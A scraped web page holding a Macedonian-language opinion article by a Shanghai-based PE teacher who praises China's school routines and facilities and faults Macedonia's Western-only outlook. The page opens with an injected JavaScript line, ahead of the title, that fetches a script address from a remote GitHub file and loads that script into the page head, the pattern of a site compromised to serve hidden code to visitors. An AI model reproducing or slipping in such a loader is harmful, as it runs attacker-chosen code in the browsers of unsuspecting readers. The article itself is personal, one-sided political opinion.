;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Образовниот систем во Н.Р. Кина – позитивен културолошки шок за еден Македонец - Антропол
АктуелноЛокално

Образовниот систем во Н.Р. Кина – позитивен културолошки шок за еден Македонец

  • Пишува: Томе Караџоски, дописник за Антропол од Н.Р. Кина и член на политичка партија Левица

Во Кина живеам и работам веќе пет години. Претходно многу малку бев запознаен за тоа како функционира животот во Кина и воопшто во земјите од далечен исток, но тоа е очекувано кога ќе земете во предвид дека во нашите медиуми и сервиси за информирање овие земји скоро и да не се споменуваат. Единствено за земјата во која требаше да се преселам на подолг период имав по некоја нафрлена информација во негативна конотација од луѓето што ги познавам и тоа беше тоа.

Како магистер од Факултетот за физичка култура, немав соодветна работна позиција во Македонија, па така без голем простор за маневрирање бев принуден среќата и лебот да си ја барам на друго место. За неполн месец откако започнав да аплицирам, склучив договор со училиште во Шангај да работам во нивниот спортски сектор.

Пред да отпатувам во мојата глава очекував да работам во некое училиште од типот на нашите „Орце Николов“, „Никола Карев“ или слично, но првиот ден кога пристигнав во училиштето не можев да им поверувам на своите очи што гледам. Првата импресија не можам да ја опишам на никаков друг начин освен како културен шок.

Цел час ми требаше само за да го запознам надворешниот дел од училиштето кој се состои од: атлетска патека, фудбалско, кошаркарско, тениско и рагби игралиште, затворен базен, скејт борд парк и уште еден куп други помошни простории. Внатрешниот дел на училиштето не е ништо поназад од тоа што веќе го видов надвор. Подоцна дознав дека секое училиште во градовите од прво, второ и трето ниво во Кина, според националните стандарди мораат да бидат составени од вакви објекти наменети за моторен раст и развој.

Училиштето се состои од: атлетска патека, фудбалско, кошаркарско, тениско и рагби игралиште, затворен базен, скејт борд парк…

Откако се преселив и започнав да работам во Кина доста работи ми дојдоа комплетно дијаметрални во однос на она што сум навикнат да го гледам во нашата средина. Премногу активности на луѓето кои ги набљудував не ми беа својствени и пријатно ме изненадуваа, во секоја позитивна смисла. На пример секојдневна глетка е да забележиш луѓе во поодминати години како групно вежбаат надвор во маало, или пак со разни реквизити успешно маневрираат и се обидуваат да се држат во физичка кондиција. Ова е целосно спротивно од она што го знам за секојдневието на нашите баби и дедовци во Македонија.

Искрено бев зачуден од каде им е таа желба и навика за вежбање, но подоцна кога започнав да работам во училиште во Шангај се ми стана јасно. Она што веднаш го забележав во училиштето е холистичкиот пристап кон ученикот.

Според националните стандарди за образование во Н.Р.Кина, училиштата мораат да бидат составени со вакви објекти

Долга приказна скратена е дека од она што сум јас навикнат во нашиот образовен систем е да појдеш во школо, да посетиш настава неколку часа и си заминеш дома. Но, во Кина покрај тоа што ги образуваат учениците, им всадуваат и една цела палета на вредности и рутини за начинот на живеење и функционирање којшто потоа го применуваат низ целиот живот.

Негување на националните вредности

Школскиот ден започнува во 07:00 часот со појадок во училишниот ресторан и веднаш потоа учителите и учениците организирано се собираат на игралиштето. Овој дел највеќе ме фасцинира бидејќи секој клас го вее кинеското знаме и се интонира кинеската химна, а на централниот јарбол церемонијално се издига кинеското знаме. Моќна глетка е да набљудуваш три илјади ученици како во еден здив ги негуваат државните вредности и симболи.

Пред секој наставен ден, секој клас го вее кинеското знаме и се интонира кинеската химна, а на централниот јарбол церемонијално се издига кинеското знаме

Воспоставување на рутини за здрав начин на живеење

Следно е физичка активност. На самото игралиште учителите по физичко образование водат еден вид на физичка изведба во која организирано учествуваат и учениците и учителите. Во оваа рутинска изведба се трча, скока, размрдува телото односно генерално се буди телото и умот на ученикот и учителот.

Пред почетокот на секој наставен ден, учениците и учителите имаат физичка активност за будење на телото

Настава

Спремен ученикот после појадок и вежби започнува со настава во првиот дел од денот која трае од 08:30 до 12:00 часот. Интересно е да се напомене дека после секој завршен час учениците под водство на учителот изведуваат специфични вежби на очите со цел да ги одморат и потоа размрдаат очните мускули, го заштитуваат видот и превенираат развој на миопија, бидејќи природно, за време на часот погледот на учениците е фиксиран во една точка (книга или табла).

После секој завршен час учениците под водство на учителот изведуваат специфични вежби на очите

Ручек и попладневна дремка 12:00 – 14:00 часот

Следува ручек, а веднаш после тоа секој ученик се повлекува во својата училна, се затвараат завесите и сите заедно вклучително и учителот спијат секој на својата клупа. На почетокот ова ми изгледаше смешно, но кога забележав колку се свежи учениците после дремката за вториот дел од денот се ми стана јасно.

Наставата трае до 16:30 часот, а важно е да се забележи дека секој ученик во текот на еден училишен ден има најмалку три часа по физичко образование без да се брои утринското вежбање.

Не сум сигурен за другите, но јас со задоволство би се согласил на ваков принцип на настава во Македонија, и доколку моето дете би можело да добие барем 70 проценти од овие содржини во училиштето кое ќе го посетува.

Јас како одговорен за секторот спорт во училиштето како и останатите вработени имаме одврзани раце да набавуваат опрема и реквизити кога и да е потребно, без посебни процедури и губење време. Последно нарачав триесет тениски рекети за учениците и ги добив за неполна недела. Нешто, што кај нас во Македонија, пример би значело дека треба, карикирам: одобрение од училишен одбор, директор, совет на општина, Министерство за финансии, распишување тендери и на крајот најголеми се шансите потребната опремата (две фудбалски топки) да не се добие или да се добие после две години макотрпно молење по врати.

После сето ова кога импресиите ми слегнаа, започнав да се запрашувам зошто никогаш порано не сум имал информација за вакви позитивни примери од земји како Кина? Дали е забрането ние како држава да црпиме искуства и позитивни приказни од другите земји и да ги применуваме во нашата пракса? Не велам дека сѐ што се случува во Кина е беспрекорно и совршено како што не е никаде во светот, но лично мене ме иритира фактот дека властите во Македонија имаат сосема игнорантски однос спрема земјите од Истокот и целосно се ориентирани спрема Западот. На овој начин губиме шанса за учење, соработка и примена на позитивни приказни од барем половина земјина топка.

Нели можеме ние да бидеме „паметниот играч” кој знае да игра со сите? Лично јас како спортист во животот секогаш сум се стремел да ми се отворени сите возможни опции, а тој што се обидувал да ми ги ускрати сум го сметал за противник и ентитет кој не ми мисли добро.

Дали сум само јас тој кој смета дека сега во мојата држава Македонија ми се пласира само порција од возможните опции за напредок и соработка, а ми се ускратуваат се останато? И сето тоа за личните интереси на мала група луѓе. Како народ сметам дека имаме заслужено многу повеќе од тоа што ни се пружа моментално, но сепак од нас зависи, треба да се избориме за да го добиеме.

Караџовски на вообичаен час по физичко во Н.Р. Кина, со ученичка од училиштето